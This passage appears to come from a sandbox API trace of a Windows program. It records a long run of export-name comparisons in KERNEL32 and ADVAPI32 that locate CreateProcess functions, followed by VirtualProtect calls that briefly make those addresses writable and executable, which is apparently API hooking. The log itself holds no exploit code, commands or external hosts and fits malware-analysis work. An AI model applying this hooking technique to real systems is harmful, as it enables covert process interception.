lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessA") returned -1 [0207.980] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessA") returned -1 [0207.981] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessA") returned 0 [0207.981] VirtualProtect (in: lpAddress=0x7ff977b3b76c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x2) returned 1 [0207.981] VirtualProtect (in: lpAddress=0x7ff977b23a0e, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x20) returned 1 [0207.981] VirtualProtect (in: lpAddress=0x7ff977b23a0e, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x40) returned 1 [0207.981] VirtualProtect (in: lpAddress=0x7ff977b3b76c, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x40) returned 1 [0207.982] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf860, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf860, ReturnLength=0x0) returned 0x0 [0207.982] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0207.982] lstrcmpA (lpString1="AcquireSRWLockExclusive", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AcquireSRWLockShared", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="ActivateActCtx", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddAtomA", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddAtomW", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddDllDirectory", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddVectoredContinueHandler", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AddVectoredExceptionHandler", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AllocConsole", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AppXGetOSMaxVersionTested", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="ApplicationRecoveryFinished", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="ApplicationRecoveryInProgress", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AreFileApisANSI", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AssignProcessToJobObject", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="AttachConsole", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BackupRead", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BackupSeek", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BackupWrite", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BaseCheckAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BaseCheckAppcompatCacheEx", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BaseCheckAppcompatCacheExWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BaseCheckAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.982] lstrcmpA (lpString1="BaseCheckElevation", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupport", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseCleanupAppcompatCacheSupportWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseDestroyVDMEnvironment", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseDllReadWriteIniFile", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseDumpAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseDumpAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseElevationPostProcessing", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseFlushAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseFlushAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseFormatObjectAttributes", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseFormatTimeOut", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseFreeAppCompatDataForProcessWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseGenerateAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseGetNamedObjectDirectory", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseInitAppcompatCacheSupport", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseInitAppcompatCacheSupportWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabled", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseIsAppcompatInfrastructureDisabledWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseIsDosApplication", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseQueryModuleData", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseReadAppCompatDataForProcessWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseSetLastNTError", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseThreadInitThunk", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseUpdateAppcompatCache", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseUpdateAppcompatCacheWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseUpdateVDMEntry", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseVerifyUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BaseWriteErrorElevationRequiredEvent", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="Basep8BitStringToDynamicUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepAllocateActivationContextActivationBlock", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepAnsiStringToDynamicUnicodeString", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepAppContainerEnvironmentExtension", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepAppXExtension", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepCheckAppCompat", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepCheckWebBladeHashes", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepCheckWinSaferRestrictions", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepConstructSxsCreateProcessMessage", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepCopyEncryption", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepFreeActivationContextActivationBlock", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepFreeAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepGetAppCompatData", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepGetComputerNameFromNtPath", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepGetExeArchType", lpString2="CreateProcessAsUserW") returned -1 [0207.983] lstrcmpA (lpString1="BasepIsProcessAllowed", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepMapModuleHandle", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepNotifyLoadStringResource", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepPostSuccessAppXExtension", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepProcessInvalidImage", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepQueryAppCompat", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepReleaseAppXContext", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepReleaseSxsCreateProcessUtilityStruct", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepReportFault", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BasepSetFileEncryptionCompression", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="Beep", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BeginUpdateResourceA", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BeginUpdateResourceW", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BindIoCompletionCallback", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BuildCommDCBA", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsA", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BuildCommDCBAndTimeoutsW", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="BuildCommDCBW", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CallNamedPipeA", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CallNamedPipeW", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CallbackMayRunLong", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CalloutOnFiberStack", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelDeviceWakeupRequest", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelIo", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelIoEx", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelSynchronousIo", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelThreadpoolIo", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelTimerQueueTimer", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CancelWaitableTimer", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CeipIsOptedIn", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="ChangeTimerQueueTimer", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckAllowDecryptedRemoteDestinationPolicy", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckElevation", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckElevationEnabled", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckForReadOnlyResource", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckForReadOnlyResourceFilter", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3A", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckNameLegalDOS8Dot3W", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckRemoteDebuggerPresent", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckTokenCapability", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CheckTokenMembershipEx", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="ClearCommBreak", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="ClearCommError", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CloseConsoleHandle", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="CloseHandle", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="ClosePackageInfo", lpString2="CreateProcessAsUserW") returned -1 [0207.984] lstrcmpA (lpString1="ClosePrivateNamespace", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseProfileUserMapping", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseState", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpool", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolCleanupGroup", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolCleanupGroupMembers", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolIo", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolTimer", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolWait", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CloseThreadpoolWork", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CmdBatNotification", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CommConfigDialogA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CommConfigDialogW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareCalendarDates", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareFileTime", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareStringA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareStringEx", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareStringOrdinal", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CompareStringW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConnectNamedPipe", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConsoleMenuControl", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ContinueDebugEvent", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertCalDateTimeToSystemTime", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertDefaultLocale", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertFiberToThread", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertSystemTimeToCalDateTime", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertThreadToFiber", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="ConvertThreadToFiberEx", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyContext", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFile2", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileExA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileExW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyFileW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CopyLZFile", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateActCtxA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateActCtxW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateActCtxWWorker", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateBoundaryDescriptorA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateBoundaryDescriptorW", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateConsoleScreenBuffer", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateDirectoryA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateDirectoryExA", lpString2="CreateProcessAsUserW") returned -1 [0207.985] lstrcmpA (lpString1="CreateDirectoryExW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateDirectoryTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateDirectoryTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateDirectoryW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateEventA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateEventExA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateEventExW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateEventW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFiber", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFiberEx", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFile2", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileMappingA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileMappingFromApp", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileMappingNumaA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileMappingNumaW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileMappingW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateFileW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateHardLinkA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateHardLinkTransactedA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateHardLinkTransactedW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateHardLinkW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateIoCompletionPort", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateJobObjectA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateJobObjectW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateJobSet", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMailslotA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMailslotW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMemoryResourceNotification", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMutexA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMutexExA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMutexExW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateMutexW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateNamedPipeA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateNamedPipeW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreatePipe", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreatePrivateNamespaceA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreatePrivateNamespaceW", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateProcessA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateProcessAsUserA", lpString2="CreateProcessAsUserW") returned -1 [0207.986] lstrcmpA (lpString1="CreateProcessAsUserW", lpString2="CreateProcessAsUserW") returned 0 [0207.986] VirtualProtect (in: lpAddress=0x7ff977b3b774, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x2) returned 1 [0207.987] VirtualProtect (in: lpAddress=0x7ff977b23a1c, dwSize=0xe, flNewProtect=0x40, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x20) returned 1 [0207.987] VirtualProtect (in: lpAddress=0x7ff977b23a1c, dwSize=0xe, flNewProtect=0x20, lpflOldProtect=0xb0938cf8c0 | out: lpflOldProtect=0xb0938cf8c0*=0x40) returned 1 [0207.987] VirtualProtect (in: lpAddress=0x7ff977b3b774, dwSize=0x4, flNewProtect=0x2, lpflOldProtect=0xb0938cf8c8 | out: lpflOldProtect=0xb0938cf8c8*=0x40) returned 1 [0207.987] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0xb0938cf860, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xb0938cf860, ReturnLength=0x0) returned 0x0 [0207.987] GetModuleHandleA (lpModuleName="ADVAPI32.DLL") returned 0x7ff976f80000 [0207.987] lstrcmpA (lpString1="A_SHAFinal", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="A_SHAInit", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="A_SHAUpdate", lpString2="CreateProcessAsUserA") returned -1 [0207.987] lstrcmpA (lpString1="AbortSystemShutdownA", 